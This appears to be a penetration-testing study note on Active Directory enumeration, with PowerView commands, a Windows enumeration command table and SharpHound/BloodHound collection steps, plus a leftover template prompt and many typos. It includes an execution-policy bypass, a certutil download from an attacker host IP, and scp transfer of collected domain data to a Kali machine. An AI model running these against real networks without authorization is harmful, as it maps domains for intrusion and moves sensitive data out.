AD Enumeartion Manual & Automated
🧠What is the Enumeartion Process​
Give us the lowdown — what is this attack and why should anyone care?
Explain the core idea behind the attack, where it fits in the kill chain, and what makes it dangerous or interesting.
Before starting enumeartion make sure to bypass powershell execution using command powershell -ep bypass. Then you'll be able to import scripts and execute them.
System Enumeartion​
PowerView Enumeartion​
User Enumeartion​
- Seraching for every user detail
Get-NetUser
- Filtering the common names
Get-NetUser | select cn
- Specific user Info
Get-NetUser -UserName pawan
- Current Logged in Users
Invoke-UserHunter
Domain Enumeartion​
- Domain Info
Get-NetDomain
- Domain Controller Info
Get-NetDomainController
Manual OS and Active Directory Enumeration - Windows
| Enumeration Area | Purpose | Command |
|---|---|---|
| OS Version | Basic version | ver |
| Detailed version & build | systeminfo | findstr /B /C:"OS" | |
| Windows Edition | systeminfo | findstr /C:"OS Name" | |
| Service Pack | systeminfo | findstr /C:"Service Pack" | |
| Architecture | echo %PROCESSOR_ARCHITECTURE% | |
| Boot time | systeminfo | find "System Boot Time" | |
| Uptime | net statistics workstation | |
| BIOS Info | wmic bios get manufacturer,version | |
| Hardware Model | wmic computersystem get model,name | |
| Hostname & Domain | Hostname | hostname |
| Domain/Workgroup | systeminfo | findstr /C:"Domain" | |
| Domain joined | net config workstation | |
| Computer name | echo %COMPUTERNAME% | |
| Domain name | echo %USERDOMAIN% | |
| User Info | Current user | whoami |
| Privileges | whoami /priv | |
| Groups | whoami /groups | |
| Full user detail | whoami /all | |
| All local users | net users | |
| Patch Info | Installed patches | wmic qfe list brief /format:table |
| (PowerShell) Hotfixes | Get-HotFix | |
| System Configs | Services | sc query or net start |
| Running processes | tasklist | |
| Scheduled tasks | schtasks /query /fo LIST /v | |
| Environment variables | set | |
| Network & Sessions | IP Configuration | ipconfig /all |
| Logged-in users | qwinsta or query user | |
| Shared resources | net share | |
| Active Directory Enumeration | Computer Info | Get-NetComputer (via PowerView) |
| List Domain Users | Get-NetUser (via PowerView) | |
| List Groups in AD | Get-NetGroup (via PowerView) | |
| Domain Trusts | Get-NetDomainTrust (via PowerView) | |
| Domain Info | Get-NetDomain (via PowerView) | |
| Find Domain Controllers | Get-NetDomainController (via PowerView) | |
| Get Active Directory Sites | Get-NetADSite (via PowerView) | |
| List Domain Controllers | Get-ADDomainController -Filter * | |
| Check for Unconstrained Delegation | Get-NetUnconstrainedDelegation (via PowerView) | |
| Kerberos Tickets Information | Get-Ticket (via PowerView) | |
| Active Directory Shares | Get-NetShare (via PowerView) | |
| Enumeration of GPOs | Get-NetGPO (via PowerView) |
Autmated Enumeation​
Using Sharphound to Collect data and BloodHound to Analyze data
Using SharpHuond​
Step 1: Download SharpHound in Windows Machine
certutil -urlcache -split -f http://192.168.45.222/SharpHound.ps1
Step 2: Import Sharphound to the PowerShell
Import-Module .\Sharphound.ps1
Step 3: Invoke BloodHound for data collection
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\pawan\Desktop\ -OutputPrefix "Pawan_audit"
Selecting -CollectionMethod as All to Collect Everything, You can check more info using command
Get-Gelp Invoke-BloodHound.
Step 4: Get the audit zip file to your kali machine.
Enable ssh in kali and then push it , if there are no other options available.
scp "C:\path\to\local\file.txt" kali@<Kali_IP_Address>:/home/kali/Documents/directory/
Step 5 : Start neo4j in kali
sudo neo4j start
Step 6: Start BlodHound
sudo bloodhound
Step 7:
Upload your audit.zip file in the blood hound and analyze the result.
Do check the version compability of the sharphound and Bloodhound that you use. SharpHound Version 2.0.0 Is compatible with BloodHound Version 4.3.1 . Or Try using Sharphound with the installed Bloodhound /usr/lib/bloodhound/resources/app/Collectors .